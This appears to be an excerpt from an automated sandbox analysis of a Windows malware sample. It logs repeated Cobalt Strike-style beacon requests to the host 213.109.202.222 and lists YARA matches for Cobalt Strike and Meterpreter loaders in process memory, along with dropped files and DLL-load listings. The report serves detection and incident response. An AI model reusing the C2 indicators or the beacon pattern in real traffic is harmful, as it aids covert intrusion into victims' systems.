      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: unknownDNS traffic detected: queries for: www.google.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.17:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.17:49758 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49824 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.126.24.148:443 -> 192.168.2.17:49828 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49866 version: TLS 1.2

      System Summary

      barindex
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile dump: C:\Users\user\AppData\Local\Temp\scoped_dir3988_1099963688\CRX_INSTALL\content.jsJump to dropped file
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile dump: C:\Users\user\AppData\Local\Temp\scoped_dir3988_1099963688\CRX_INSTALL\content_new.jsJump to dropped file
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile dump: C:\Users\user\AppData\Local\Temp\scoped_dir3988_1227127054\CRX_INSTALL\eventpage_bin_prod.jsJump to dropped file
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile dump: C:\Users\user\AppData\Local\Temp\scoped_dir3988_1227127054\CRX_INSTALL\page_embed_script.jsJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: apphelp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: appvisvsubsystems32.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: vcruntime140.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: c2r32.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: wininet.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: sspicli.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: iertutil.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: windows.storage.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: wldp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: profapi.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: appvisvsubsystems32.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: c2r32.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: vcruntime140.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: wininet.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: sspicli.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: iertutil.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: windows.storage.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: wldp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: profapi.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: apphelp.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wininet.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: urlmon.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: iertutil.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: srvcli.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: netutils.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: uxtheme.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: windows.storage.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wldp.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: propsys.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: profapi.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: edputil.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: sspicli.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wintypes.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: appresolver.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: bcp47langs.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: slc.dll
